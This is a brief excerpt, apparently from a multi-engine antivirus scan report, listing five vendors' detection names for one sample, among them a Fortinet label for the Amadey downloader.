Tencent Malware.Win32.Gencirc.146b1fd4
huorong Trojan/Generic!23958BC2A306C122
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Amadey.A!tr.dldr
AVG Win32:MalwareX-gen [Adw]